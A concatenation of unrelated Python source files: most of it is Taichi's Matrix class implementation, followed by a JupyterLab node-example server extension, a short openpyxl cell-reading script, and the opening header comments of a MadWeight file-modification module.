f' x = ti.field(ti.f32, ({self.n}, {self.m})).\n'
' See https://taichi.readthedocs.io/en/stable/tensor_matrix.html#matrix-size'
' for more details.',
UserWarning,
stacklevel=2)
def is_global(self):
results = [False for _ in self.entries]
for i, e in enumerate(self.entries):
if isinstance(e, expr.Expr):
if e.is_global():
results[i] = True
assert results[i] == results[0], \
"Matrices with mixed global/local entries are not allowed"
return results[0]
def element_wise_binary(self, foo, other):
_taichi_skip_traceback = 1
ret = self.empty_copy()
if isinstance(other, (list, tuple)):
other = Matrix(other)
if isinstance(other, Matrix):
assert self.m == other.m and self.n == other.n, f"Dimension mismatch between shapes ({self.n}, {self.m}), ({other.n}, {other.m})"
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other.entries[i])
else: # assumed to be scalar
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other)
return ret
def broadcast_copy(self, other):
if isinstance(other, (list, tuple)):
other = Matrix(other)
if not isinstance(other, Matrix):
ret = self.empty_copy()
ret.entries = [other for _ in ret.entries]
other = ret
assert self.m == other.m and self.n == other.n, f"Dimension mismatch between shapes ({self.n}, {self.m}), ({other.n}, {other.m})"
return other
def element_wise_ternary(self, foo, other, extra):
ret = self.empty_copy()
other = self.broadcast_copy(other)
extra = self.broadcast_copy(extra)
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other.entries[i],
extra.entries[i])
return ret
def element_wise_writeback_binary(self, foo, other):
ret = self.empty_copy()
if isinstance(other, (list, tuple)):
other = Matrix(other)
if is_taichi_class(other):
other = other.variable()
if foo.__name__ == 'assign' and not isinstance(other, Matrix):
raise TaichiSyntaxError(
'cannot assign scalar expr to '
f'taichi class {type(self)}, maybe you want to use `a.fill(b)` instead?'
)
if isinstance(other, Matrix):
assert self.m == other.m and self.n == other.n, f"Dimension mismatch between shapes ({self.n}, {self.m}), ({other.n}, {other.m})"
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other.entries[i])
else: # assumed to be scalar
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i], other)
return ret
def element_wise_unary(self, foo):
_taichi_skip_traceback = 1
ret = self.empty_copy()
for i in range(self.n * self.m):
ret.entries[i] = foo(self.entries[i])
return ret
def __matmul__(self, other):
_taichi_skip_traceback = 1
assert isinstance(other, Matrix), "rhs of `@` is not a matrix / vector"
assert self.m == other.n, f"Dimension mismatch between shapes ({self.n}, {self.m}), ({other.n}, {other.m})"
del _taichi_skip_traceback
ret = Matrix.new(self.n, other.m)
for i in range(self.n):
for j in range(other.m):
acc = self(i, 0) * other(0, j)
for k in range(1, other.n):
acc = acc + self(i, k) * other(k, j)
ret.set_entry(i, j, acc)
return ret
    def linearize_entry_id(self, *args):
        """Map a (row, col) index to the flat index into ``self.entries``.

        Accepts ``(i,)``, ``(i, j)`` or a single list/tuple; a missing
        column defaults to 0 (vector access). Indices must be compile-time
        Python ints and in range.
        """
        assert 1 <= len(args) <= 2
        if len(args) == 1 and isinstance(args[0], (list, tuple)):
            args = args[0]
        if len(args) == 1:
            args = args + (0, )
        # presumably consumed via frame inspection by taichi's traceback
        # filtering, as elsewhere in this file -- do not remove
        _taichi_skip_traceback = 1
        # TODO(#1004): See if it's possible to support indexing at runtime
        for i, a in enumerate(args):
            if not isinstance(a, int):
                raise TaichiSyntaxError(
                    f'The {i}-th index of a Matrix/Vector must be a compile-time constant '
                    f'integer, got {type(a)}.\n'
                    'This is because matrix operations will be **unrolled** at compile-time '
                    'for performance reason.\n'
                    'If you want to *iterate through matrix elements*, use a static range:\n'
                    '  for i in ti.static(range(3)):\n'
                    '    print(i, "-th component is", vec[i])\n'
                    'See https://taichi.readthedocs.io/en/stable/meta.html#when-to-use-for-loops-with-ti-static for more details.'
                )
        assert 0 <= args[0] < self.n, \
            f"The 0-th matrix index is out of range: 0 <= {args[0]} < {self.n}"
        assert 0 <= args[1] < self.m, \
            f"The 1-th matrix index is out of range: 0 <= {args[1]} < {self.m}"
        return args[0] * self.m + args[1]
def __call__(self, *args, **kwargs):
_taichi_skip_traceback = 1
assert kwargs == {}
return self.entries[self.linearize_entry_id(*args)]
def get_field_members(self):
return self.entries
@deprecated('x.get_tensor_members()', 'x.get_field_members()')
def get_tensor_members(self):
return self.get_field_members()
def get_entry(self, *args, **kwargs):
assert kwargs == {}
return self.entries[self.linearize_entry_id(*args)]
def set_entry(self, i, j, e):
idx = self.linearize_entry_id(i, j)
if impl.inside_kernel():
self.entries[idx].assign(e)
else:
self.entries[idx] = e
def place(self, snode):
for e in self.entries:
snode.place(e)
@taichi_scope
def subscript(self, *indices):
_taichi_skip_traceback = 1
if self.is_global():
ret = self.empty_copy()
for i, e in enumerate(self.entries):
ret.entries[i] = impl.subscript(e, *indices)
return ret
else:
assert len(indices) in [1, 2]
i = indices[0]
j = 0 if len(indices) == 1 else indices[1]
return self(i, j)
@property
def x(self):
_taichi_skip_traceback = 1
if impl.inside_kernel():
return self.subscript(0)
else:
return self[0]
@property
def y(self):
_taichi_skip_traceback = 1
if impl.inside_kernel():
return self.subscript(1)
else:
return self[1]
@property
def z(self):
_taichi_skip_traceback = 1
if impl.inside_kernel():
return self.subscript(2)
else:
return self[2]
@property
def w(self):
_taichi_skip_traceback = 1
if impl.inside_kernel():
return self.subscript(3)
else:
return self[3]
# since Taichi-scope use v.x.assign() instead
@x.setter
@python_scope
def x(self, value):
_taichi_skip_traceback = 1
self[0] = value
@y.setter
@python_scope
def y(self, value):
_taichi_skip_traceback = 1
self[1] = value
@z.setter
@python_scope
def z(self, value):
_taichi_skip_traceback = 1
self[2] = value
@w.setter
@python_scope
def w(self, value):
_taichi_skip_traceback = 1
self[3] = value
class Proxy:
def __init__(self, mat, index):
"""Proxy when a tensor of Matrices is accessed by host."""
self.mat = mat
self.index = index
@python_scope
def __getitem__(self, item):
if not isinstance(item, (list, tuple)):
item = [item]
return self.mat(*item)[self.index]
@python_scope
def __setitem__(self, key, value):
if not isinstance(key, (list, tuple)):
key = [key]
self.mat(*key)[self.index] = value
@property
def x(self):
return self[0]
@property
def y(self):
return self[1]
@property
def z(self):
return self[2]
@property
def w(self):
return self[3]
@x.setter
def x(self, value):
self[0] = value
@y.setter
def y(self, value):
self[1] = value
@z.setter
def z(self, value):
self[2] = value
@w.setter
def w(self, value):
self[3] = value
@property
def value(self):
ret = self.mat.empty_copy()
for i in range(self.mat.n):
for j in range(self.mat.m):
ret.entries[i * self.mat.m + j] = self.mat(i,
j)[self.index]
return ret
# host access & python scope operation
@python_scope
def __getitem__(self, indices):
if self.is_global():
return Matrix.Proxy(self, indices)
if not isinstance(indices, (list, tuple)):
indices = [indices]
assert len(indices) in [1, 2]
i = indices[0]
j = 0 if len(indices) == 1 else indices[1]
return self(i, j)
@python_scope
def __setitem__(self, indices, item):
if self.is_global():
if not isinstance(item, (list, tuple)):
item = list(item)
if not isinstance(item[0], (list, tuple)):
item = [[i] for i in item]
for i in range(self.n):
for j in range(self.m):
self(i, j)[indices] = item[i][j]
return
if not isinstance(indices, (list, tuple)):
indices = [indices]
assert len(indices) in [1, 2]
i = indices[0]
j = 0 if len(indices) == 1 else indices[1]
self.set_entry(i, j, item)
def __len__(self):
return self.n
def __iter__(self):
if self.m == 1:
return (self(i) for i in range(self.n))
else:
return ([self(i, j) for j in range(self.m)] for i in range(self.n))
def empty_copy(self):
return Matrix.empty(self.n, self.m)
def copy(self):
ret = self.empty_copy()
ret.entries = copy.copy(self.entries)
return ret
@taichi_scope
def variable(self):
ret = self.copy()
ret.entries = [impl.expr_init(e) for e in ret.entries]
return ret
@taichi_scope
def cast(self, dtype):
_taichi_skip_traceback = 1
ret = self.copy()
for i in range(len(self.entries)):
ret.entries[i] = ops_mod.cast(ret.entries[i], dtype)
return ret
def trace(self):
assert self.n == self.m
sum = self(0, 0)
for i in range(1, self.n):
sum = sum + self(i, i)
return sum
@taichi_scope
def inverse(self):
assert self.n == self.m, 'Only square matrices are invertible'
if self.n == 1:
return Matrix([1 / self(0, 0)])
elif self.n == 2:
inv_det = impl.expr_init(1.0 / self.determinant())
# Discussion: https://github.com/taichi-dev/taichi/pull/943#issuecomment-626344323
return inv_det * Matrix([[self(1, 1), -self(0, 1)],
[-self(1, 0), self(0, 0)]]).variable()
elif self.n == 3:
n = 3
import taichi as ti
inv_determinant = ti.expr_init(1.0 / self.determinant())
entries = [[0] * n for _ in range(n)]
def E(x, y):
return self(x % n, y % n)
for i in range(n):
for j in range(n):
entries[j][i] = ti.expr_init(
inv_determinant * (E(i + 1, j + 1) * E(i + 2, j + 2) -
E(i + 2, j + 1) * E(i + 1, j + 2)))
return Matrix(entries)
elif self.n == 4:
n = 4
import taichi as ti
inv_determinant = ti.expr_init(1.0 / self.determinant())
entries = [[0] * n for _ in range(n)]
def E(x, y):
return self(x % n, y % n)
for i in range(n):
for j in range(n):
entries[j][i] = ti.expr_init(
inv_determinant * (-1)**(i + j) *
((E(i + 1, j + 1) *
(E(i + 2, j + 2) * E(i + 3, j + 3) -
E(i + 3, j + 2) * E(i + 2, j + 3)) -
E(i + 2, j + 1) *
(E(i + 1, j + 2) * E(i + 3, j + 3) -
E(i + 3, j + 2) * E(i + 1, j + 3)) +
E(i + 3, j + 1) *
(E(i + 1, j + 2) * E(i + 2, j + 3) -
E(i + 2, j + 2) * E(i + 1, j + 3)))))
return Matrix(entries)
else:
raise Exception(
"Inversions of matrices with sizes >= 5 are not supported")
inversed = deprecated('a.inversed()', 'a.inverse()')(inverse)
@kern_mod.pyfunc
def normalized(self, eps=0):
impl.static(
impl.static_assert(self.m == 1,
"normalized() only works on vector"))
invlen = 1 / (self.norm() + eps)
return invlen * self
@staticmethod
@deprecated('ti.Matrix.transposed(a)', 'a.transpose()')
def transposed(a):
return a.transpose()
@deprecated('a.T()', 'a.transpose()')
def T(self):
return self.transpose()
@kern_mod.pyfunc
def transpose(self):
ret = Matrix([[self[i, j] for i in range(self.n)]
for j in range(self.m)])
return ret
    @taichi_scope
    def determinant(a):
        """Return the determinant of `a` (2x2, 3x3 or 4x4 matrices only).

        Note: the receiver is named `a` rather than `self`; it is still an
        instance method, called as ``mat.determinant()``.
        """
        if a.n == 2 and a.m == 2:
            # closed form: ad - bc
            return a(0, 0) * a(1, 1) - a(0, 1) * a(1, 0)
        elif a.n == 3 and a.m == 3:
            # cofactor expansion along the first column
            return a(0, 0) * (a(1, 1) * a(2, 2) - a(2, 1) * a(1, 2)) - a(
                1, 0) * (a(0, 1) * a(2, 2) - a(2, 1) * a(0, 2)) + a(
                    2, 0) * (a(0, 1) * a(1, 2) - a(1, 1) * a(0, 2))
        elif a.n == 4 and a.m == 4:
            import taichi as ti
            n = 4

            def E(x, y):
                # wrap indices modulo n so cofactor terms can be written
                # uniformly with i + offset
                return a(x % n, y % n)

            det = ti.expr_init(0.0)
            for i in range(4):
                # expansion along the first column with alternating signs
                det = det + (-1.0)**i * (
                    a(i, 0) *
                    (E(i + 1, 1) *
                     (E(i + 2, 2) * E(i + 3, 3) - E(i + 3, 2) * E(i + 2, 3)) -
                     E(i + 2, 1) *
                     (E(i + 1, 2) * E(i + 3, 3) - E(i + 3, 2) * E(i + 1, 3)) +
                     E(i + 3, 1) *
                     (E(i + 1, 2) * E(i + 2, 3) - E(i + 2, 2) * E(i + 1, 3))))
            return det
        else:
            raise Exception(
                "Determinants of matrices with sizes >= 5 are not supported")
@staticmethod
def diag(dim, val):
ret = Matrix(dim, dim)
for i in range(dim):
for j in range(dim):
if i == j:
ret.set_entry(i, j, val)
else:
ret.set_entry(i, j, 0 * val)
# TODO: need a more systematic way to create a "0" with the right type
return ret
def loop_range(self):
return self.entries[0]
@property
def shape(self):
# Took `self.entries[0]` as a representation of this tensor-of-matrices.
# https://github.com/taichi-dev/taichi/issues/1069#issuecomment-635712140
return self.loop_range().shape
@deprecated('x.dim()', 'len(x.shape)')
def dim(self):
return len(self.shape)
@property
def dtype(self):
return self.loop_range().dtype
@deprecated('x.data_type()', 'x.dtype')
def data_type(self):
return self.dtype
@property
def snode(self):
return self.loop_range().snode
def make_grad(self):
ret = self.empty_copy()
for i in range(len(ret.entries)):
ret.entries[i] = self.entries[i].grad
return ret
def sum(self):
ret = self.entries[0]
for i in range(1, len(self.entries)):
ret = ret + self.entries[i]
return ret
@kern_mod.pyfunc
def norm(self, eps=0):
return ops_mod.sqrt(self.norm_sqr() + eps)
@kern_mod.pyfunc
def norm_inv(self, eps=0):
return ops_mod.rsqrt(self.norm_sqr() + eps)
@kern_mod.pyfunc
def norm_sqr(self):
return (self**2).sum()
@kern_mod.pyfunc
def max(self):
return ops_mod.ti_max(*self.entries)
@kern_mod.pyfunc
def min(self):
return ops_mod.ti_min(*self.entries)
    def any(self):
        """Return 1 if any entry is nonzero, else 0.

        The ti.cmp_* ops yield -1 for true and 0 for false (see ``all``,
        which compares the sum against -len(entries)), so the running sum
        is negative iff at least one entry is nonzero; the final
        ``-cmp_lt(ret, 0)`` converts that back to 0/1.
        """
        import taichi as ti
        ret = ti.cmp_ne(self.entries[0], 0)
        for i in range(1, len(self.entries)):
            ret = ret + ti.cmp_ne(self.entries[i], 0)
        return -ti.cmp_lt(ret, 0)
    def all(self):
        """Return 1 if every entry is nonzero, else 0.

        Each true ti.cmp_ne contributes -1, so the sum equals
        -len(entries) exactly when all entries are nonzero.
        """
        import taichi as ti
        ret = ti.cmp_ne(self.entries[0], 0)
        for i in range(1, len(self.entries)):
            ret = ret + ti.cmp_ne(self.entries[i], 0)
        return -ti.cmp_eq(ret, -len(self.entries))
def fill(self, val):
if impl.inside_kernel():
def assign_renamed(x, y):
import taichi as ti
return ti.assign(x, y)
return self.element_wise_writeback_binary(assign_renamed, val)
if isinstance(val, numbers.Number):
val = tuple(
[tuple([val for _ in range(self.m)]) for _ in range(self.n)])
elif isinstance(val,
(list, tuple)) and isinstance(val[0], numbers.Number):
assert self.m == 1
val = tuple([(v, ) for v in val])
if isinstance(val, Matrix):
val_tuple = []
for i in range(val.n):
row = []
for j in range(val.m):
row.append(val.get_entry(i, j))
row = tuple(row)
val_tuple.append(row)
val = tuple(val_tuple)
assert len(val) == self.n
assert len(val[0]) == self.m
from .meta import fill_matrix
fill_matrix(self, val)
@python_scope
def to_numpy(self, keep_dims=False, as_vector=None, dtype=None):
# Discussion: https://github.com/taichi-dev/taichi/pull/1046#issuecomment-633548858
if as_vector is not None:
warning(
'v.to_numpy(as_vector=True) is deprecated, '
'please use v.to_numpy() directly instead',
DeprecationWarning,
stacklevel=3)
as_vector = self.m == 1 and not keep_dims
shape_ext = (self.n, ) if as_vector else (self.n, self.m)
if not self.is_global():
return np.array(self.entries).reshape(shape_ext)
if dtype is None:
dtype = to_numpy_type(self.dtype)
ret = np.zeros(self.shape + shape_ext, dtype=dtype)
from .meta import matrix_to_ext_arr
matrix_to_ext_arr(self, ret, as_vector)
return ret
@python_scope
def to_torch(self, device=None, keep_dims=False):
import torch
as_vector = self.m == 1 and not keep_dims
shape_ext = (self.n, ) if as_vector else (self.n, self.m)
ret = torch.empty(self.shape + shape_ext,
dtype=to_pytorch_type(self.dtype),
device=device)
from .meta import matrix_to_ext_arr
matrix_to_ext_arr(self, ret, as_vector)
import taichi as ti
ti.sync()
return ret
@python_scope
def from_numpy(self, ndarray):
if len(ndarray.shape) == len(self.loop_range().shape) + 1:
as_vector = True
assert self.m == 1, "This matrix is not a vector"
else:
as_vector = False
assert len(ndarray.shape) == len(self.loop_range().shape) + 2
dim_ext = 1 if as_vector else 2
assert len(ndarray.shape) == len(self.loop_range().shape) + dim_ext
from .meta import ext_arr_to_matrix
ext_arr_to_matrix(ndarray, self, as_vector)
import taichi as ti
ti.sync()
@python_scope
def from_torch(self, torch_tensor):
return self.from_numpy(torch_tensor.contiguous())
    @python_scope
    def copy_from(self, other):
        """Copy every entry of another matrix field of the same
        dimensionality into this one."""
        assert isinstance(other, Matrix)
        from .meta import tensor_to_tensor
        assert len(self.shape) == len(other.shape)
        tensor_to_tensor(self, other)
    @taichi_scope
    def __ti_repr__(self):
        """Yield the pieces of a Taichi-scope repr.

        Produces '[a, b]' for vectors (m == 1) and '[[a, b], [c, d]]' for
        general matrices; entries are yielded as Taichi expressions.
        """
        yield '['
        for i in range(self.n):
            if i:
                yield ', '
            if self.m != 1:
                # open an inner bracket per row only for true matrices
                yield '['
            for j in range(self.m):
                if j:
                    yield ', '
                yield self(i, j)
            if self.m != 1:
                yield ']'
        yield ']'
def __str__(self):
"""Python scope matrix print support."""
if impl.inside_kernel():
'''
It seems that when pybind11 got an type mismatch, it will try
to invoke `repr` to show the object... e.g.:
TypeError: make_const_expr_f32(): incompatible function arguments. The following argument types are supported:
1. (arg0: float) -> taichi_core.Expr
Invoked with: <Taichi 2x1 Matrix>
So we have to make it happy with a dummy string...
'''
return f'<{self.n}x{self.m} ti.Matrix>'
else:
return str(self.to_numpy())
def __repr__(self):
if self.is_global():
# make interactive shell happy, prevent materialization
return f'<{self.n}x{self.m} ti.Matrix.field>'
else:
return str(self.to_numpy())
@staticmethod
@taichi_scope
def zero(dt, n, m=1):
import taichi as ti
return Matrix([[ti.cast(0, dt) for _ in range(m)] for _ in range(n)])
@staticmethod
@taichi_scope
def one(dt, n, m=1):
import taichi as ti
return Matrix([[ti.cast(1, dt) for _ in range(m)] for _ in range(n)])
@staticmethod
@taichi_scope
def unit(n, i, dt=None):
import taichi as ti
if dt is None:
dt = int
assert 0 <= i < n
return Matrix([ti.cast(int(j == i), dt) for j in range(n)])
@staticmethod
@taichi_scope
def identity(dt, n):
import taichi as ti
return Matrix([[ti.cast(int(i == j), dt) for j in range(n)]
for i in range(n)])
    @staticmethod
    def rotation2d(alpha):
        """Return the 2x2 counter-clockwise rotation matrix for angle
        *alpha* (in radians)."""
        import taichi as ti
        return Matrix([[ti.cos(alpha), -ti.sin(alpha)],
                       [ti.sin(alpha), ti.cos(alpha)]])
    @classmethod
    @python_scope
    def field(cls,
              n,
              m,
              dtype,
              shape=None,
              offset=None,
              needs_grad=False,
              layout=None):  # TODO(archibate): deprecate layout
        '''ti.Matrix.field: declare a global n x m matrix field.

        dtype may be one Taichi type, or a list/tuple/ndarray of types
        (one per entry) so each component gets its own dtype (see #2135).
        shape/offset: field shape and index offset (number or tuple).
        needs_grad: also place a gradient field for autodiff.
        layout: ti.AOS (default) or ti.SOA entry placement.
        '''
        self = cls.empty(n, m)
        self.entries = []
        self.n = n
        self.m = m
        self.dt = dtype
        if isinstance(dtype, (list, tuple, np.ndarray)):
            # set different dtype for each element in Matrix
            # see #2135
            if m == 1:
                assert len(np.shape(dtype)) == 1 and len(
                    dtype
                ) == n, f'Please set correct dtype list for Vector. The shape of dtype list should be ({n}, ) instead of {np.shape(dtype)}'
                for i in range(n):
                    self.entries.append(impl.field(dtype[i]))
            else:
                assert len(np.shape(dtype)) == 2 and len(dtype) == n and len(
                    dtype[0]
                ) == m, f'Please set correct dtype list for Matrix. The shape of dtype list should be ({n}, {m}) instead of {np.shape(dtype)}'
                for i in range(n):
                    for j in range(m):
                        self.entries.append(impl.field(dtype[i][j]))
        else:
            # uniform dtype: one scalar field per matrix entry
            for _ in range(n * m):
                self.entries.append(impl.field(dtype))
        self.grad = self.make_grad()
        if layout is not None:
            assert shape is not None, 'layout is useless without shape'
        if shape is None:
            assert offset is None, "shape cannot be None when offset is being set"
        if shape is not None:
            # normalize scalar shape/offset to 1-tuples
            if isinstance(shape, numbers.Number):
                shape = (shape, )
            if isinstance(offset, numbers.Number):
                offset = (offset, )
            if offset is not None:
                assert len(shape) == len(
                    offset
                ), f'The dimensionality of shape and offset must be the same ({len(shape)} != {len(offset)})'
            import taichi as ti
            if layout is None:
                layout = ti.AOS
            dim = len(shape)
            if layout.soa:
                # SOA: each entry (and its grad) gets its own dense SNode
                for i, e in enumerate(self.entries):
                    ti.root.dense(ti.index_nd(dim), shape).place(e,
                                                                 offset=offset)
                    if needs_grad:
                        ti.root.dense(ti.index_nd(dim),
                                      shape).place(e.grad, offset=offset)
            else:
                # AOS: all entries (and grads) share a single dense SNode
                var_list = []
                for i, e in enumerate(self.entries):
                    var_list.append(e)
                if needs_grad:
                    for i, e in enumerate(self.entries):
                        var_list.append(e.grad)
                ti.root.dense(ti.index_nd(dim), shape).place(*tuple(var_list),
                                                             offset=offset)
        return self
    @classmethod
    @python_scope
    @deprecated('ti.Matrix.var', 'ti.Matrix.field')
    def var(cls, n, m, dt, *args, **kwargs):
        '''ti.Matrix.var: deprecated alias of ti.Matrix.field.'''
        _taichi_skip_traceback = 1  # hide this frame from Taichi tracebacks
        return cls.field(n, m, dt, *args, **kwargs)
    @classmethod
    def _Vector_field(cls, n, dtype, *args, **kwargs):
        '''ti.Vector.field: an n-component vector field is an n x 1 matrix field.'''
        _taichi_skip_traceback = 1  # hide this frame from Taichi tracebacks
        return cls.field(n, 1, dtype, *args, **kwargs)
    @classmethod
    @deprecated('ti.Vector.var', 'ti.Vector.field')
    def _Vector_var(cls, n, dt, *args, **kwargs):
        '''ti.Vector.var: deprecated alias of ti.Vector.field.'''
        _taichi_skip_traceback = 1  # hide this frame from Taichi tracebacks
        return cls._Vector_field(n, dt, *args, **kwargs)
    @staticmethod
    def rows(rows):
        """Build a matrix from a list of rows.

        Each row is either a Matrix vector (m == 1) or a plain python list;
        all rows must share the same length.  Raises for any other input.
        """
        mat = Matrix()
        mat.n = len(rows)
        if isinstance(rows[0], Matrix):
            for row in rows:
                assert row.m == 1, "Inputs must be vectors, i.e. m == 1"
                assert row.n == rows[
                    0].n, "Input vectors must share the same shape"
            # each input vector of length n becomes a row of width n
            mat.m = rows[0].n
            # l-value copy:
            mat.entries = [row(i) for row in rows for i in range(row.n)]
        elif isinstance(rows[0], list):
            for row in rows:
                assert len(row) == len(
                    rows[0]), "Input lists share the same shape"
            mat.m = len(rows[0])
            # l-value copy:
            mat.entries = [x for row in rows for x in row]
        else:
            raise Exception(
                "Cols/rows must be a list of lists, or a list of vectors")
        return mat
@staticmethod
def cols(cols):
return Matrix.rows(cols).transpose()
@classmethod
def empty(cls, n, m):
return cls([[None] * m for _ in range(n)])
@classmethod
def new(cls, n, m):
if impl.inside_kernel():
return cls(n, m)
else:
return cls.empty(n, m)
    def __hash__(self):
        """Identity-based hash so matrices stay hashable."""
        # TODO: refactor KernelTemplateMapper
        # If not, we get `unhashable type: Matrix` when
        # using matrices as template arguments.
        return id(self)
    @kern_mod.pyfunc
    def dot(self, other):
        """Dot product of two vectors (both operands must have m == 1)."""
        impl.static(
            impl.static_assert(self.m == 1, "lhs for dot is not a vector"))
        impl.static(
            impl.static_assert(other.m == 1, "rhs for dot is not a vector"))
        return (self * other).sum()
@kern_mod.pyfunc
def _cross3d(self, other):
ret = Matrix([
self[1] * other[2] - self[2] * other[1],
self[2] * other[0] - self[0] * other[2],
self[0] * other[1] - self[1] * other[0],
])
return ret
@kern_mod.pyfunc
def _cross2d(self, other):
ret = self[0] * other[1] - self[1] * other[0]
return ret
def cross(self, other):
if self.n == 3 and self.m == 1 and other.n == 3 and other.m == 1:
return self._cross3d(other)
elif self.n == 2 and self.m == 1 and other.n == 2 and other.m == 1:
return self._cross2d(other)
else:
raise ValueError(
"Cross product is only supported between pairs of 2D/3D vectors"
)
    @kern_mod.pyfunc
    def outer_product(self, other):
        """Outer product of two vectors; returns a (self.n x other.n) matrix."""
        impl.static(
            impl.static_assert(self.m == 1,
                               "lhs for outer_product is not a vector"))
        impl.static(
            impl.static_assert(other.m == 1,
                               "rhs for outer_product is not a vector"))
        ret = Matrix([[self[i] * other[j] for j in range(other.n)]
                      for i in range(self.n)])
        return ret
# TODO: deprecate ad-hoc use ti.Matrix() as global (#1500:2.2/2)
def Vector(n, dt=None, shape=None, offset=None, **kwargs):
    """Construct an n-component column vector, i.e. an n x 1 Matrix."""
    return Matrix(n, 1, dt=dt, shape=shape, offset=offset, **kwargs)
# Re-export the vector-relevant Matrix helpers on the Vector factory so they
# are reachable as ti.Vector.* (a Vector is just an n x 1 Matrix).
Vector.var = Matrix._Vector_var
Vector.field = Matrix._Vector_field
Vector.zero = Matrix.zero
Vector.one = Matrix.one
Vector.dot = Matrix.dot
Vector.cross = Matrix.cross
Vector.outer_product = Matrix.outer_product
Vector.unit = Matrix.unit
Vector.normalized = Matrix.normalized
| 34.166994 | 142 | 0.505951 |
79547904c009f3f7a09b0624a0758552e9366bd2 | 1,102 | py | Python | packages/services/examples/node/main.py | xjc90s/jupyterlab | 82df0b635dae2c1a70a7c41fe7ee7af1c1caefb2 | [
"BSD-3-Clause"
] | null | null | null | packages/services/examples/node/main.py | xjc90s/jupyterlab | 82df0b635dae2c1a70a7c41fe7ee7af1c1caefb2 | [
"BSD-3-Clause"
] | 8 | 2022-01-04T19:19:07.000Z | 2022-03-03T22:11:12.000Z | packages/services/examples/node/main.py | xjc90s/jupyterlab | 82df0b635dae2c1a70a7c41fe7ee7af1c1caefb2 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import absolute_import, print_function
import json
import os.path as osp
from jupyterlab_server.process import which
from jupyterlab_server.process_app import ProcessApp
HERE = osp.dirname(osp.realpath(__file__))
def _jupyter_server_extension_points():
    """Declare the Jupyter Server extension entry point for this module."""
    return [{"module": __name__, "app": NodeApp}]
class NodeApp(ProcessApp):
    """Jupyter server process app that launches the node example client."""
    name = __name__
    # allow cross-origin requests so the node client can reach the server
    serverapp_config = dict(allow_origin="*")
    def get_command(self):
        """Get the command and kwargs to run."""
        # Run the node script with command arguments.
        config = dict(
            baseUrl="http://localhost:{}{}".format(self.serverapp.port, self.settings["base_url"]),
            token=self.settings["token"],
        )
        # index.js reads its connection info from this config.json file
        with open(osp.join(HERE, "config.json"), "w") as fid:
            json.dump(config, fid)
        cmd = [which("node"), "index.js", "--jupyter-config-data=./config.json"]
        return cmd, dict(cwd=HERE)
# Allow running this extension directly as a standalone Jupyter server app.
if __name__ == "__main__":
    NodeApp.launch_instance()
| 26.878049 | 99 | 0.671506 |
79547994d102841a4ca227cc1b5815c6c8076e27 | 310 | py | Python | BizPy/openpyxl/20200212/read_all_cells.py | t2y/python-study | 52a132ea600d4696164e540d8a8f8f5fc58e097a | [
"Apache-2.0"
] | 18 | 2016-08-15T00:24:44.000Z | 2020-11-30T15:11:52.000Z | BizPy/openpyxl/20200212/read_all_cells.py | t2y/python-study | 52a132ea600d4696164e540d8a8f8f5fc58e097a | [
"Apache-2.0"
] | null | null | null | BizPy/openpyxl/20200212/read_all_cells.py | t2y/python-study | 52a132ea600d4696164e540d8a8f8f5fc58e097a | [
"Apache-2.0"
] | 6 | 2016-09-28T10:47:03.000Z | 2020-10-14T10:20:06.000Z | import sys
import sys

from openpyxl import load_workbook

# Read-only iteration over every cell of the first worksheet of the workbook
# given on the command line.
filename = sys.argv[1]
wb = load_workbook(filename, read_only=True)
# Bug fix: the f-string had no placeholder; report the actual file name.
print(f'{filename} のワークシート情報を読み込みます')
ws0 = wb.worksheets[0]
print(f'{ws0.title} のセルを1行ずつ表示します')
for row in ws0:
    values = [str(column.value) for column in row]
    print(values)
# read-only workbooks keep the file handle open until closed
wb.close()
| 23.846154 | 51 | 0.712903 |
795479e3a5ed99ebc20af2487244637d0535963a | 44,848 | py | Python | madgraph/madweight/mod_file.py | valassi/mg5amc_test | 2e04f23353051f64e1604b23105fe3faabd32869 | [
"NCSA"
] | 1 | 2016-07-09T00:05:56.000Z | 2016-07-09T00:05:56.000Z | madgraph/madweight/mod_file.py | valassi/mg5amc_test | 2e04f23353051f64e1604b23105fe3faabd32869 | [
"NCSA"
] | 4 | 2022-03-10T09:13:31.000Z | 2022-03-30T16:15:01.000Z | madgraph/madweight/mod_file.py | valassi/mg5amc_test | 2e04f23353051f64e1604b23105fe3faabd32869 | [
"NCSA"
] | 1 | 2016-07-09T00:06:15.000Z | 2016-07-09T00:06:15.000Z | #!/usr/bin/env python
####################################################################################################
####################################################################################################
## ##
## MOD FILE MODULE ##
## ##
####################################################################################################
####################################################################################################
## ##
## Author: Mattelaer Olivier ##
## Institution: UCL-CP3 ##
## contact: omattelaer@uclouvain.be ##
## ##
## last modification: 01/06/10 ##
## tag release: 1.4 ##
## ##
####################################################################################################
## ##
## MANUAL ##
## ##
####################################################################################################
## ##
##   This module is dedicated to modifying files in a planned way. The files must contain    ##
##   tags in order to perform the needed modifications. All tags follow this syntax:         ##
## $B$ NAME $B$ -> begin of a block to modify with RULE=NAME ##
## $E$ NAME $E$ -> end of the block to modify with RULE=NAME ##
## $B$ NAME $E$ -> replace tag by RULE=NAME ##
## Some character are reserved: ##
## 'S-','_' and '+' ##
## 'S-': indicates a special tag (see later). Don't start name with this two caracter ##
## '_' : indicates begin of option in special tag, use freely if you are not in this case ##
## '+' : for splitting different option value (use freely elsewhere) ##
## ##
## This is the special expression authorized in NAME (all start with S-) ##
## ##
## S-END:(only in rule) add the text in end (no tag needed) ##
## S-DEl:(in mod_file) supress this part of the file ##
## S-COMMENT_?: start commenting the defined region. ##
## The comment tag will be the value in place of the '?'. the '?' Can not contain '+' or '_' ##
## S-DECOMMENT_?:(only in rule) inverse the comment procedure apply with S-COMMENT (go back to ##
## original line) ##
## S-REGEX_exp+new[+opt]: regular expression to move an expression to another. ##
## "exp": a Python regular expression for the text to modify ##
## "new": the new expression to write ##
## "opt": python option for regular option (the one in re.compile) ##
## if this rule appear in rule file, the modification appear in the complete file. ##
## no '_' or '+' are autorized in "exp" or "new". those one can be echap with '\' ##
## ##
## Priority order ##
## if a step define a tag that will in a future step the modification on the tag will be done ##
## if you want to prevent this create the tag with $B-DIFF$ and with $E-DIFF$ ##
## ##
## 1) we first apply the global REGEXP ##
## 2) we apply decomment module ##
